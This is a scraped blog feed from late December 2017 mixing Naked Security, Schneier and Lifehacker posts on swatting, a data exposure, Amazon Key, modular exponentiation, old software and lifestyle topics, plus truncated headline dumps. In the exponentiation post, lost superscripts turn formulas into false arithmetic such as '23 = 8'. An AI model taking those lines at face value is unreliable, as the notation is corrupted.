Sunday, December 31, 2017
Saturday, December 30, 2017
Alleged “Call of Duty” swatter arrested in LA after fatal shooting
A 25-year-old man has been arrested in Los Angeles in connection with a recent swatting incident in Wichita, Kansas.
According to investigative cybersecurity journalist Brian Krebs, who has been the victim of swatting attacks himself from crooks he has outed on his blog, this incident “reportedly originated over a $1.50 wagered match in the online game Call of Duty.”
“Swatting” involves calling the emergency services and quite deliberately making a false report of a violent incident at someone else’s address so that armed police turn up and storm the place, believing that a serious crime is in progress.
The word comes from the abbreviation SWAT, short for Special Weapons And Tactics, the name given to law enforcement teams that are dispatched to respond to this sort of incident.
At the very best, the outcome of a hoax “swat” call is that the victim suffers a traumatic experience from being confronted by armed police.
Sadly, however, the result was much worse in the recent Kansas incident: a man at the property was shot and killed by mistake in the course of the raid.
As Krebs explains it:
It appears that the dispute and subsequent taunting originated on Twitter. One of the parties to that dispute — allegedly using the Twitter handle “SWauTistic” — threatened to swat another user who goes by the nickname “7aLeNT“. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.
Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.
Police in Wichita, Kansas, have published the audio of the swatting call, during which a male voice can be heard saying:
(Caller) There was an argument with my mom and dad [. . .] They were arguing and I shot him in the head and he’s not breathing any more [. . .] (Dispatcher) Do you have any weapons on you? […] (Caller) Yeah, I do […] a handgun.
Later on, the caller claims to be pointing the gun at his mother and his little brother “to make sure they stay in the closet.”
When the dispatcher asks if he’ll give up the gun, he replies that “if you guys are going to send someone round here, I’m definitely not going to put it away,” and warns the dispatcher that he’s doused the house with gasoline (petrol) and might set it on fire.
Krebs goes on to describe how someone claiming to be the perpetrator made online contact with him shortly after the incident; Krebs ascertained that his anonymous contact semed to have a history of making fake bomb threats and falsely calling armed police to other people’s houses.
According to Krebs, this person told him that “bomb threats are more fun and cooler than swats in my opinion and I should have just stuck to that.”
If the suspect arrested in LA, turns out to be the guilty party in this tragic escalation of a Twitter argument, he may have cause to change his mind about how “cool” such behaviour really is.
Our thoughts go out to the family of the innocent victim in this sordid saga.
from Naked Security http://ift.tt/2q0otLL
Friday, December 29, 2017
Fancy a T-shirt? Try our New Year’s #sophospuzzle crossword…
Are you working over the New Year?
Well, whatever you’re up to – but especially if you’re on sysadmin or tech support duty while the rest of us are partying – here’s a bit of fun that looks just like real work but isn’t. (Don’t let on that we said so.)
Presenting the NYE 2017 #sophospuzzle crossword:
This interactive crossword puzzle requires JavaScript and any recent web browser, including Windows Internet Explorer, Mozilla Firefox, Google Chrome, or Apple Safari. If you have disabled web page scripting, please re-enable it and refresh the page. If this web page is saved on your computer, you may need to click the yellow Information Bar at the top or bottom of the page to allow the puzzle to load.
There’s a Sophos T-shirt for the for the first correct solution received, and a T-shirt for a one other successful solver chosen from the rest of the correct answers received in time.
The cutoff for entries to be eligible for a T-shirt is 2018-01-02T12:00T-10 (that’s noon in Hawaii on the day after New Year’s Day).
If you get stuck, try a search engine; if you’re still stuck after that, try following @NakedSecurity on Twitter, and keep your eye on the hashtag #sophospuzzle.
(All we ask is that you don’t spoil it for other people – public hints and teasers are fine, but please don’t blurt out complete answers.)
You are also welcome to email us for hints on tips@sophos.com if you don’t use Twitter, or if you want to keep your hints to yourself.
To try for a T-shirt, take a screenshot when you have finished the puzzle, and email it to us.
Please put the text SOLUTION at the start of the subject line, and let us know in the email if you’re OK with being named amongst the solvers.
You can tell us some or all of: your name, nickname, city, country and Twitter handle – or choose to stay anonymous. (We’ll only use your email address to contact you if you win a shirt – we won’t add you to any mailing lists, honest)
Good luck with your puzzling, and, from the Naked Security team, Happy New Year!
from Naked Security http://ift.tt/2BThndA
Holiday Fun #3: It’s (never) too late to learn long multiplication!
So far this week we’ve looked at Question 1 and Question 2 in our holiday-fun suggestions for technodiversions you might like:
- Install a non-mainstream operating system. Because you can.
- Fool around with software you used to love. No one will know.
- Rewrite a well-known algorithm from scratch. Prove you can still code.
Today, it’s time to consider Question 3:
You settle down to rewrite a well-known algorithm from scratch, to prove you can still code. Which do you choose?
Modular exponentiation
Quicksort
Conway’s Game of Life
Let’s start at the beginning…
Modular exponentiation
One good reason to learn about modular exponentiation is that it’s a very handy algorithm in cryptography.
Indeed, modular exponentiation can be used to agree on a secure, secret encryption key with someone else, even if you have to use a public, insecure network for your communication. (Look for Diffie-Hellman-Merkle, also abbreviated to Diffie-Hellman or just DH.)
The trick is that modular exponents are easy – or, at least, fairly easy – to calculate, but as good as impossible to reverse.
If you remember your school mathematics, exponentiation is repeated multiplication; the inverse (the operation that gets you back where you started) is a logarithm, or log for short.
For example, 2 to the power 3 is 2×2×2, and works out to be 8 (23 = 8, for short); going backwards, we say that the logarithm to the base 2 of 8 is 3 (log28 = 3).
In general, if bE = Y, then logbY = E.
(The base is the number at the bottom – the value than gets multiplied by itself over and over – and the exponent it’s raised to is the elevated number above the base – the number of repeated multiplications you need to do.)
Calculating 23 in your head is easy, but working out log28 is much trickier.
In fact, it’s easiest to start the other way around and use approximation: keep on multiplying 2 by itself until you hit, or get close to, the answer you’re looking for.
In cryptography, modular exponentiation complicates things still further by dividing the result after each repeated multiplication by a specially-chosen prime number, and taking the remainder, known as the modulus, like this:
Once you add the “take the remainder” step into the exponentiation process, it becomes as good as impossible to reverse the process algebraically: there’s no formula to compute a modular logarithm, so you pretty much have to try every possible input until you hit upon the solution by chance.
In general, if bX mod P = Y, then you can quickly calculate Y given X, but there is no shortcut by which you can solve the equation backwards for X if you are given Y.
How quick is “quick”?
We glibly said above that “you can quickly calculate Y given X“, but just how quick is “quick”?
Let’s ignore the modulus part for now, and just consider the repeated multiplications, given that in cryptographic calculations we aren’t usually multiplying single-digit numbers like 2×2, but dealing with numbers that have hundreds or even thousands of digits.
Most modern computers can only multiply 64-bit values in one go, and typical IoT computers or smartcards may only be able to do calculations 32 bits or 16 bits at a time.
We need to break the multiplication down into chunks we can compute, just as you do in the old-school process of long multiplication.
Long multiplication lets you multiply big numbers such as 745×368 one digit at a time, because:
745 x 368 = 745 x (3x100 + 6x10 + 8x1)
= 745x3x100 + 745x6x10 + 745x8x1
= (7x100 + 4x10 + 5x1) x (3x100) + (7x100 + 4x10 + 5x1) x (6x10) + . . .
= (7x3 x100x100 + 4x3 x10x100 + 5x3 x1x100) + . . . etc.
Multiplying by 10, 100, 1000 and so on is easy (just add the correct number of zeros onto the end), so long multiplication means you replace a single 3-digit by 3-digit multiply with nine 1-digit by 1-digit multiplies.
Here’s how to do long multiplication with pen and paper, if you’ve never seen it before:
That’s approach quick enough for numbers that you might call “biggish”, but you get bogged down fast when the numbers become huge.
For example, using this algorithm to multiply together two 2048-bit prime numbers so you only work on 64 bits at a time means splitting each number into 32 chunks of 64 bits each, and therefore needs 32×32 = 1024 multiplies.
If you have a 32-bit CPU, you’ll need to do 64×64 = 4096 multiplies to produce all the intermediate results, and then do all the necessary addition operations to combine them into a multi-precision result.
In general, the complexity goes up as a the square of the number of digits, which is OK for small numbers but gets sluggish quickly.
Cutting down the work
Multiplication quickly becomes computationally expensive, given that doubling the lengths of the numbers involved (for example, going from 1024-bit cryptographic keys to 2048-bit keys to stay ahead of crackers) will typically quadruple the workload.
Of course, exponentiation with huge powers means lots of multiplying, so anything we can do to reduce the number of individual multiplies will help enormously.
Handily, when it comes to exponentiation, there’s a shortcut based on the fact that we aren’t multiplying together two arbitrary numbers each time – we’re multiplying by the same number (the base) over and over again.
So, we can repeatedly multiply the result of each previous multiplication with itself, instead of multiplying by the base each time:
And that’s the trick known as exponentiation-by-squaring: after N-1 loops, you reach your base to the power of 2N-1, rather than just to the power of N. (Above, after 4 loops we get to 516 on the right but only to 55 on the left.)
And with all the powers of 2 up to 2N-1, you can represent any number up to 20 + 21 + … 2N-1, which just happens to be 2N−1, so you can represent any exponent up to 2N−1, and therefore you can compute your base raised the power 2N−1 with at most N multiplies.
Actually, you need at most 2N multiplies, because you need N multiplies to do all the squaring, plus up to another N multiplies more to combine the various powers to get the result.
But if your exponent has 2048 bits, that means you’ll need at most 2 x log22048 multiplies to get the job done, instead of naively looping round naively 2047 times – that’s a workload of 12/2047, or well under 1% of the effort.
What next?
Unfortunately, there just wasn’t time in this article to deal with the other two algorithms in today’s quiz question, so we’ll have to ask you to wait for us to cover them some time in the New Year.
In the meantime, why not take our Holiday Fun quiz (and watch out for our New Year’s #sophospuzzle crossword, coming soon to Naked Security)?
from Naked Security http://ift.tt/2BTHlh2
Jezebel Dallas Woman Allegedly Destroyed Two Andy Warhol Paintings on First Date With Former Trump F
Jezebel Dallas Woman Allegedly Destroyed Two Andy Warhol Paintings on First Date With Former Trump Fundraiser | Splinter Consider That Trump Might Just Be Dumb | Deadspin Horse Loses Jockey Yards From The Wire, Costing Bettor $571,000 | Earther RIP Lil Snail | The Root New York State Couple, Kids, Brutally Murdered; Police Vow to Solve Crime |
from Lifehacker http://ift.tt/2BTCX1s
Thursday, December 28, 2017
Deadspin We’ve Forgotten How To Fear | Jezebel Maybe People Should Refresh Themselves On What ‘Movie
Deadspin We’ve Forgotten How To Fear | Jezebel Maybe People Should Refresh Themselves On What ‘Movies’ Are Before Seeing The Last Jedi | Splinter ‘There was NO blood, NO semen and there was NO Satanism’: Read The Scathing Editor’s Notes on Milo’s Killed Book | Earther Why the Eastern US Will Be Bone Chillingly Cold Through New Year’s | Very Smart Brothas 2017: The Year Liberal White People Reminded Us That They’re White, Too |
from Lifehacker http://ift.tt/2zJf4If
Holiday Fun #2: Relove some old software…
In our holiday quiz, we made three suggestions for techno-geeky diversions you might like to try:
- Install a non-mainstream operating system. Because you can.
- Fool around with software you used to love. No one will know.
- Rewrite a well-known algorithm from scratch. Prove you can still code.
Yesterday, we took at a look at Q1, and the three answers we presented for you to choose from.
Today, it’s time for Q2:
You’re on your own, so you can fool around with software you used to love and no one will know. Which do you choose?
Emacs
TeX (keep it real – no LaTeX allowed)
Leisure Suit Larry in the Land of the Lounge Lizards
To be honest, today’s question is more humorous than serious – not least because two of the software packages listed above are still in widespread use, while the third isn’t, at least not at work.
But here goes, anyway.
Emacs
In simple words, Emacs is a text editor – but don’t call it that, whatever you do, because the name itself is short for Editing MACroS, an extensible environment for building a flexible text editor, among many other things.
Indeed, Emacs does a lot more that just letting you work on files – the GNU Emacs flavour of the app that ships with Apple’s macOS even includes a manifesto about “free” software, accessible by pressing Ctrl-H Ctrl-P. (We used to think that was shorthand for Help/Propaganda, but it seems that it might just be Help/Project.)
Most Emacs implementations are written predominantly in the Lisp programming language, with a small Lisp interpreter at the heart of the software to make it all work.
The Lisp engine inside Emacs makes it extremely extensible, with add-on packages available so you can do everything from reading your email to browsing the internet without leaving the editor at all – indeed, without so much starting up a second program that communicates with Emacs.
If you’re familiar with Microsoft’s DDE (dynamic data exchange), for example, you’ll know that Word and Excel can be loaded load side-by-side and exchange data in real time – but that sort of software integration isn’t the Emacs way.
If Office were like Emacs, you’d have Excel implemented as a set of macros inside Word, or Word written as macros inside Excel – or, better yet, you’d have Word and Excel programmed as macros inside Powerpoint.
As you can imagine, that means a running Emacs instance often isn’t small.
Indeed, you’ll sometimes hear Emacs antagonists telling you that it’s short for Eighty thousand Megabytes And Continuously Swapping. (Actually, the disparaging name started off as “eight megabytes”, back when a megabyte of physical memory would draw breaths of amazement, but we’ve corrected for the current era.)
In the Unix and Linux worlds, the two best-known editors are Vi (short for VIsual editor) and Emacs, and once you’ve settled into one camp or the other, it’s rare to switch sides.
When we polled Naked Security readers on Twitter, this is what we got:
Calling all coders: 🗣 #tellSophos whether life is better with:
—
Naked Security (@NakedSecurity) August 08, 2017
If you’re one of the 15% who use Emacs to this day, please accept our apologies for implying that Emacs is a pile of “old software” that you used to adore but fell out of love with.
And if you’re a Vi user, why not show some holiday goodwill and give Emacs another try? (Only kidding!)
TeX
TeX, which is properly written (and pronounced) as if it were in Ancient Greek, has the middle letter set below the others, just to show what it’s capable of.
The name looks a little bit – but not actually – like this: TEX.
You can tell that a document was typeset using TeX at a glance, because it will look fiercely and proudly scientific, in the fashion of this paper published in the Annals of Improbable Research:
TeX is still enormously popular amongst academics, notably with mathematicians, physicists and computer scientists, not least because of the ease with which it can typeset mathematical formulas and proofs.
Those three disciplines have by far the best parties – especially low-temperature physicists, because someone is bound to show up with a bucket of liquid nitrogen, with two fantastic outcomes: a bubble monster, and on-demand ice cream.
So if you can get yourself invited, be sure to take advantage, but make sure you don’t commit either of these social blunders:
- Don’t pronounce TeX as though you were talking about Texas, or even as though you were saying the start of the word technology. Pretend you are talking about a Scottish loch, and add a gentle guttural roll to it, och aye. In the jargon, say it as a voiceless velar fricative.
- Don’t refer to TeX as a word processor, or even as a document formatter. It’s a typesetting system. In fact, play ignorant and don’t mention TeX at all. Say, “I love your paper – I see you had it typeset professionally.”
(If you do make either of these mistakes, don’t panic: bring along a bottle of chocolate milk as a backup. A few seconds in the LN2 and they’ll be eating out of your hand. Literally.)
Leisure Suit Larry
We’re not sure quite how to explain this one, so we’ll just show you what the packaging looked like back in 1987, when it came out:
A picture is worth 1000 words, even if they were only 16-bit words back then – that’s all we’re saying.
What next?
Why not take our quiz now – it’s anonymous, and we think it’s fun:
from Naked Security http://ift.tt/2lnBQQN
Deadspin Please Stop These Bad Hall Of Fame Arguments | Jezebel Comedian Iliza Shlesinger Sued for B
Deadspin Please Stop These Bad Hall Of Fame Arguments | Jezebel Comedian Iliza Shlesinger Sued for Banning Men From ‘Girls Night In’ Show | Splinter Roy Moore Cries Voter Fraud and Blames Black Voters in Last-Ditch Effort to Fight Election Results | Earther The Cities of the Future Could Be Built From Mushrooms | The Root The 2017 Wypipo Awards |
from Lifehacker http://ift.tt/2lmBU3j
Deadspin Steelers’ Maurkice Pouncey Says James Harrison “Erased His Own Legacy” By Signing With Patr
Deadspin Steelers’ Maurkice Pouncey Says James Harrison “Erased His Own Legacy” By Signing With Patriots | The Muse Bono Is Sad Men Have No Outlet For Their Anger Now That They Let Women Make Music | Very Smart Brothas Why So Many of Us Are So Willing to Be Led by ‘Ain’t Shit’ Men, Explained | Splinter The Internet’s Absolute Best Owns: 2017 Edition | Earther The Biggest Environmental Setbacks of 2017 |
from Lifehacker http://ift.tt/2BZlOYx
The "Extended Random" Feature in the BSAFE Crypto Library
Matthew Green wrote a fascinating blog post about the NSA's efforts to increase the amount of random data exposed in the TLS protocol, and how it interacts with the NSA's backdoor into the DUAL_EC_PRNG random number generator to weaken TLS.
from Schneier on Security http://ift.tt/2Chx4yL
Wednesday, December 27, 2017
Holiday Fun #1: Try an unusual operating system…
Just before Christmas, we put together a holiday-fun quiz to find out what sort of techno-geeky diversions you’d like to lose yourself in, assuming that [a] you have some time off work and [b] you have some online time to spare.
There are three suggestions in the quiz:
- Install a non-mainstream operating system. Because you can.
- Fool around with software you used to love. No one will know.
- Rewrite a well-known algorithm from scratch. Prove you can still code.
But what about the answers?
We pre-selected three answers for each question, and we asked you to pick one of our choices.
So we thought we’d review the questions one by one over the course of this week to encourage you to take part if you haven’t already. (Actually, given that it’s just for fun, you can vote again if you change your mind – that’s fine with us.)
Today, we’re going to look at Q1:
You decide to install a non-mainstream operating system. Because you can. Which do you choose?
HaikuOS
Minix
Plan 9 from Bell Labs
This question isn’t a joke – all the choices above are real operating systems you can download and try today.
They’re somewhat off the beaten track for most people, though.
HaikuOS describes itself as “an open-source operating system that specifically targets personal computing. Inspired by the BeOS, Haiku is fast, simple to use, easy to learn and yet very powerful.”
There’s hasn’t been an official version, however, since the Alpha 4 release on November 2012. (Even the apology about the age of the release is out of date, saying “Alpha 4 is now almost 5 years old.”)
So, we went for the latest nightly build, currently haiku-nightly-hrev51712, and we went old-school with the 32-bit build on the grounds that it’s still binary compatible with the long-defunct 32-bit BeOS product from the 1990s.
I remember BeOS fondly, because it was, well, it was cool.
BeOS supported all sorts of multimedia stuff smoothly; you didn’t have to spend hours hacking around with X11 configuration files; there was no time-consuming cross-your-fingers-twice configure-and-make stage; and it had a consistent, clean, reliable window manager that looked superb.
But it was wacky, too: I once did a test intall and everything worked – my network card, the graphics card that was a science project to use under Linux, everything, except the keyboard. Go figure.
Well, no such trouble with the HaikuOS nightly build – in a VirtualBox VM, it took no more than a few seconds to get a live desktop booted and running and the Naked Security website loaded in the WebPositive browser:
Just like the 1990s, when BeOS was around, the speed was astonishing, lagginess was non-existent, the graphics rendering crisp, and the look surprisingly contemporary. (That’s one way of saying that BeOS was ahrad of its time.)
We won’t make any recommendations beyond that, however: we couldn’t figure out how to view the TLS certificate of the website you just connected to, or to check the ciphers supported and used by the browser, so we have no idea how safe you’re likely to be using it.
Nevertheless, it’s worth trying out HaikuOS just to feel how fast software can be if it really tries.
Our next experiment was Minix, a venerable, free operating system that was not only the inspiration for Linux but also the starting point for Linus Torvalds to get a running system on which to begin development.
Linux, however, ended up very much unlike Minix, and much more like every other mainstream operating system on the market today.
In Linux, user programs run outside the kernel, in what’s known as userland, so they can be regulated pretty closely, but the kernel itself is a vast, sprawling underground edifice that houses all the low-level code – what’s known as a monolithic kernel.
Minix comes from a different starting point: it’s a microkernel, where the privileged code in the kernel itself is kept to a minimum and as much code as possible, including the low-level drivers that control the hardware itself, runs in userland.
The theory is simple: start with the goals of security and maintainability, and worry about performance later.
That makes Minix is a fantastic learning tool, and worth trying out if you haven’t done so already.
Like HaikuOS, Minix releases are something of a rarity, with the most recent official version being 3.3.0 from November 2014.
We wanted something more recent, so we used the 3.4.0rc6 snapshot from May 2017; this includes a basic X Window System so you can fire up a graphical interface right away.
Yes, that’s twm, short for Tom’s Window Manager, with its default apps: three xterms and an xclock.
Welcome to 1987, complete with X started as root and a bunch of root terminals open by default – for all the caution in its design, the Minix installer advises you to set everything up with a root login and then leaves you to get security right later on.
Ironically, the most recent Firefox file we could find in the official online package repository was 49.0, and that turned out to be the language files only, not the browser itself.
We decided to used the venerable text-mode browser Lynx instead, but the version offered to us didn’t seem to speak a recent enough dialect of TLS, so we tried links, another text-mode browser, as you can see above.
If you get any further than this (a recent Firefox would be nice to see), do let us know in the comments.
And that brings us to Plan 9 from Bell Labs.
Named after the cult 1950s science fiction movie Plan 9 from Outer Space – a strange namesake for a software product to choose, given than the movie’s fame comes from its reputation as the worst film ever made.
Amusingly, Plan 9’s mascot is Glenda, named after the movie Glen or Glenda, an early 1950s film about transvestism from the same director, Ed Woods. (By some accounts, Glen or Glenda was even worse than Plan 9 from Outer Space.)
Plan 9 was a research project at Bell Labs that can be considered decades ahead of its time: everything in the operating system is treated like a file, including devices, traditional files, processes, network connections and more.
Instead of different naming conventions and programming interfaces for local and remote commands, local and network-based files, local and distributed computing jobs…
…there was one input/output protocol to rule them all, 9P.
Where Unix has the cat command to dump data out of files, but needs a completely different command called netcat to shovel data across the network, Plan 9 doesn’t.
Whether a file is moving along a disk cable, across a network link or between two processes in memory (even two processes on different computers), in Plan 9 you can use the same command everywhere.
Plan 9 never really emerged from the research world into real life – the project didn’t survive the enforced breakup of US telecommunications provider AT&T, of which Bell Labs was a part.
What next?
Why not take our quiz now – it’s anonymous, and we think it’s fun:
from Naked Security http://ift.tt/2zDsmGd
Deadspin James Harrison Is A New England Patriot | The Muse A Few Dreadful Fashion Trends From 2007
Deadspin James Harrison Is A New England Patriot | The Muse A Few Dreadful Fashion Trends From 2007 That Are Already Back | Earther New York Just Sued Trump’s EPA Again | Splinter The Most Powerful Members of the Trump Administration Are Keeping Their Schedules Secret | The Root Arizona Man Posted Video Singing Carols With His Son, Hours Before Killing His Family: Report |
from Lifehacker http://ift.tt/2l52ezw
We all need IT! (Happy holidays from Sophos)
Spare a thought for the IT heroes who are working away right now so that you can stay online over Christmas.
Sure, it’s their job – they knew that the holiday season was coming and that someone would need to be on duty, just to make sure that you would be able to post that cool new cat video you made on Christmas Day.
And, sure, it’s their job all year round – so they should be used to it by now.
But that’s no reason not to say a big thank you!
So, we wrote a song for all the heroes in IT, and we invited the world’s 25 most famous singers to perform it.
Here’s what happened:
(Can’t see the video directly above this line? Watch on YouTube instead.)
PS. For everyone who isn’t getting a holiday at New Year, but who will be on duty in front of a keyboard and a screen, we’ve got something coming up for you: a #sophospuzzle crossword. That’s right, you can sit right at your desk, looking busy and, if the truth be told, actually being busy! Better still, you’ll actually learning something about computer security at the same time. (That’s the excuse to give if you need it.) So, watch this space for details. OK, not this place. Not literally. But watch this website, or keep your eye on the hashtag #sophospuzzle on Twitter to find out when the puzzle starts. (We’ll be sending a Dance like Nobody’s Watching T-shirt to the fastest solver, so the sooner you start solving, the brighter your chances.)
from Naked Security http://ift.tt/2C0OIHu
Post-Quantum Algorithms
NIST has organized a competition for public-key algorithms secure against a quantum computer. It recently published all of its Round 1 submissions. (Details of the NIST efforts are here. A timeline for the new algorithms is here.)
from Schneier on Security http://ift.tt/2pGdnM3
Tuesday, December 26, 2017
Monday, December 25, 2017
Sunday, December 24, 2017
Saturday, December 23, 2017
Friday, December 22, 2017
Friday Squid Blogging: Gonatus Squid Eating a Dragonfish
There's a video:
Last July, Choy was on a ship off the shore of Monterey Bay, looking at the video footage transmitted by an ROV many feet below. A Gonatus squid was spotted sucking off the face of a "really huge dragonfish," she says. "It took a little while to figure out what's going on here, who's eating whom, how is this going to end?" (The squid won.)
As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.
Read my blog posting guidelines here.
from Schneier on Security http://ift.tt/2DyR79C
How to Set Up a Basic Smart Home Sound System
Our Homehackers video series is back to help you convert your typical casa into a super cool smart home. In this episode, we cover the basics of smart home stereos and talk about your best entry-level options for listening to music in any room at your place.
I meet up with household tech expert John Quain at Homehackers HQ once again to learn about the smart sound systems most people are rockin’ these days. First up is the Bose SoundLink Color Bluetooth speaker II, which is the easiest to set up, has great sound quality for $130 speaker, and is battery powered so you can take it anywhere (even if you’re not at home). Next up is the $150 Amazon Echo Plus, which is a great option for non-audiophiles who want the functionality of Alexa and doesn’t mind good but not great sound quality. Last but not least, the popular Sonos PLAY:1 has superb sound quality and allows you to set up multiple speakers in the same room for $200 each (current new low price is $150).
Advertisement
After we go over the basics of each speaker, JQ shows us how to quickly pair your smartphone with the Bose speaker via bluetooth, set up the Amazon Echo Plus and download music skills in the Alexa app, and get a Sonos sound system up and running right out of the box. Be sure to check out our other Homehackers episodes on setting up a smart home hub and water sensor, as well as our video guide to smart lighting and wireless security cameras.
Credits:
Director - Kiran Chitanvis
Line Producer - Anastasia Weeks
Associate Producer - Zoe Stahl
Director of Photography - Tomas Velasquez
B Camera - Jorge Corona
Additional Camera - Bernardo Garcia
Sound Recordist - Kathy Lee
Production Designer - Susan Chau
Gaffer - Michael Kim
Editor - Eddie Costas
Editor - Hannah Whisenant
Production Assistant - Tiffani DuPree
Special Thanks to CORE Real Estate NYC and 60 White
from Lifehacker http://ift.tt/2zgnp61
I'm Feminist Press Director Jamia Wilson, and This Is How I Work
Jamia Wilson grew up reading books from the Feminist Press, so she’s proud to be the literary publisher’s executive director (the youngest person, and the first woman of color, to lead the 47-year-old press). When she became director, Wilson was already an outspoken activist and writer whose work had appeared in the Feminist Press titles Slut and I Still Believe Anita Hill. We talked to Wilson in print and on video about her work habits, her inspirations, and the concrete ways the Press fosters teamwork.
Current Gig: Executive Director at the Feminist Press at City University of New York
One word that best describes how you work: Thoughtfully
Current mobile device: A gold iPhone 6 and iPad
Current computer: Macbook Pro and Apple Desktop
Take us through a recent workday.
Here’s a snapshot of a recent workday from my planner:
- Morning prayers
- Get my blood pumping by jumping on my rebounder
- Read the news and check Twitter to stay up to speed on the #resistance
- Send edits in on a personal book project
- Subway to work
- Staff meeting
- Emails
- Review cover art and go over editorial checklist
- Follow up with donors to our Giving Tuesday appeal
- Planning for upcoming staff annual reviews
- Meet with Instagram book bloggers from Australia
- Teach at John Jay College of Criminal Justice
- Debrief with co-prof
- Netflix
- Bed
What apps, gadgets, or tools can’t you live without?
I can’t live without my label maker. I’m also a big believer in handwritten notes in the digital age. I keep a stack of stationary ready at work and at home. Expensify. Voice memo. Evernote. Dropbox. Google Suite...and of course, Venmo.
What’s your workspace setup like?
I keep my space pretty open and spacious. I have a desktop Mac, a phone, files, oodles of books, and a ficus plant that my board gave me as a gift.
What’s your best shortcut or life hack?
The Instant Pot has changed my life. I have food allergies and need to prepare a lot of my own food. It’s nice to have one appliance that can do 7 things efficiently.
Who are the people who help you get things done, and how do you rely on them?
The Feminist Press team is super collaborative. Everyone is passionate about our mission and ready to roll up their sleeves to achieve our goals.
How do you keep track of what you have to do?
Danielle LaPorte’s Desire Map Planner Weekly keeps me on focused on enlivening my purpose through my tasks. Google Calendar helps me manage my schedule.
What’s your least favorite thing to do, and how do you deal with it?
I don’t love the subway. I wish I could beam myself to work and back everyday. Manspreading is a real phenomenon. Luckily, I can hold my own.
How do you recharge or take a break from work?
Walking meditations help me release stress. I also enjoy listening to my husband play classical piano, binge-watching The Crown and She’s Gotta Have It on Netflix and curling up with a good book.
What’s your favorite side project?
Writing, writing, and more writing.
What are you currently reading, or what’s something you’d recommend?
I’m currently reading Your Art Will Save Your Life by Beth Pickens.
Fill in the blank: I’d love to see ____ answer these same questions.
What’s the best advice you’ve ever received?
“When we speak we are afraid our words will not be heard or welcomed. But when we are silent, we are still afraid. So it is better to speak.”—Audre Lorde
Next, check out Jamia’s advice on public speaking.
This interview has been lightly edited and some links have been added.
The How I Work series asks heroes, experts, and flat-out productive people to share their shortcuts, workspaces, routines, and more. Have someone you want to see featured, or questions you think we should ask? Email Nick.
from Lifehacker http://ift.tt/2BXTBAn
The Grapevine This Video of Jay-Z, Beyoncé and Ms.
The Grapevine This Video of Jay-Z, Beyoncé and Ms. Tina Doing the Electric Slide Is Everything | Deadspin Mets Owner Wishes The Yankees Wouldn’t Spend So Much Money | Earther California Counties Are Suing the Oil Industry After a Record Fire Season | Jezebel Katy Perry’s Alleged Stalker Arrested, Says He’ll Do ‘Whatever It Takes’ to Be With Her | Splinter Sean Hannity Calls Out NBC for Not Reading NBC |
from Lifehacker http://ift.tt/2BAjzKX
Data on 123 million US households exposed
What surprising things might a keen data hunter find sitting in an unsecured state on a cloud service these days?
For a researcher at UpGuard, on 6 October the answer turned out to be an intriguing 36GB database file sitting in plain view on an Amazon Simple Storage Service (S3) bucket uploaded by analytics company Alteryx.
Leaky bucket might be a better description because when opened the database revealed the personal financial data of 123m American households – in effect everyone with an address in the US around the time of the file’s creation in 2013.
Let’s digest this: regardless of whether you’ve heard of Alteryx or not (and few will), if you’re a US householder, a humungous trove of your personal data was inside this easily-accessible file.
And quite a cache it was too, comprising 123m rows, each with 248 columns, culled from the US Census Bureau bulked with a “massive” amount from credit-reporting company Experian.
What data? It’d be easier to say what wasn’t in the database in fact. UpGuard quotes Experian’s marketing blurb used to sell the data to third parties such as Alteryx:
With thousands of attributes on more than 300 million consumers and 126 million households, ConsumerView data provides a deeper understanding of your customers, resulting in more actionable insights across channels…
No wonder Alteryx wanted it. In case anyone assumes the data was anonymised, UpGuard reckons:
While the spreadsheet uses anonymized record IDs to identify households, the other information in the fields – as well as another spreadsheet in the bucket – are sufficiently detailed as to be not merely often identifying, but with a high degree of specificity.
In addition to trifles such as address, telephone number and estimated income, this included home valuations, when householders last bought a car, what magazines they subscribe to, how much they like to travel, their cat ownership – you name it.
Experian clearly knows an awful lot about Americans and has been trading it around partners to use, one of which didn’t secure it well, or at all.
All UpGuard needed to access the data was a free Amazon Web Services (AWS) account anyone could open, which marks this incident as the sort of screw up security people will be quoting as a cautionary tale in conference presentations for years to come.
Had the data been noticed by criminals rather than a researcher, the latest incident could easily have ranked as a major breach similar to the one that affected Experian’s rival Equifax in September.
Experian’s odd reaction has been to pass the buck, telling Forbes:
This is an Alteryx issue, and does not involve any Experian systems.
Technically correct but disingenuous. Surely any company handing over large amounts of sensitive data on every household in the US knows it is a loaded weapon in the wrong hands and has a duty to set some standards as to how it will be secured.
As with previous incidents, the leak is another reminder about the mysterious lack of data protection rules in the US. In my opinion, the system leans too lazily on bad publicity to curb weak security when what is needed is independent intervention.
from Naked Security http://ift.tt/2Blua8u
Amazon's Door Lock Is Amazon's Bid to Control Your Home
Interesting essay about Amazon's smart lock:
When you add Amazon Key to your door, something more sneaky also happens: Amazon takes over.
You can leave your keys at home and unlock your door with the Amazon Key app -- but it's really built for Amazon deliveries. To share online access with family and friends, I had to give them a special code to SMS (yes, text) to unlock the door. (Amazon offers other smartlocks that have physical keypads).
The Key-compatible locks are made by Yale and Kwikset, yet don't work with those brands' own apps. They also can't connect with a home-security system or smart-home gadgets that work with Apple and Google software.
And, of course, the lock can't be accessed by businesses other than Amazon. No Walmart, no UPS, no local dog-walking company.
Keeping tight control over Key might help Amazon guarantee security or a better experience. "Our focus with smart home is on making things simpler for customers -- things like providing easy control of connected devices with your voice using Alexa, simplifying tasks like reordering household goods and receiving packages," the Amazon spokeswoman said.
But Amazon is barely hiding its goal: It wants to be the operating system for your home. Amazon says Key will eventually work with dog walkers, maids and other service workers who bill through its marketplace. An Amazon home security service and grocery delivery from Whole Foods can't be far off.
This is happening all over. Everyone wants to control your life: Google, Apple, Amazon...everyone. It's what I've been calling the feudal Internet. I fear it's going to get a lot worse.
from Schneier on Security http://ift.tt/2pbqCUu
Thursday, December 21, 2017
Deadspin Arenas Are Important And Football Stadiums Are Not | Pictorial Stage Door: The 1937 Film th
Deadspin Arenas Are Important And Football Stadiums Are Not | Pictorial Stage Door: The 1937 Film that Reveals Why Hollywood’s Sexual Harassment Reckoning Took So Long to Arrive | Earther Snowfall Is Getting Weird In Alaska | Splinter Shutting Jimmy Fallon Up Is the Greatest Gift Cardi B Gave Us in 2017 | The Root US Ambassador Nikki Haley Threatens UN Members Not to Vote Against the US and No One Cares |
from Lifehacker http://ift.tt/2kVbRQl
What do techies really want for Christmas?
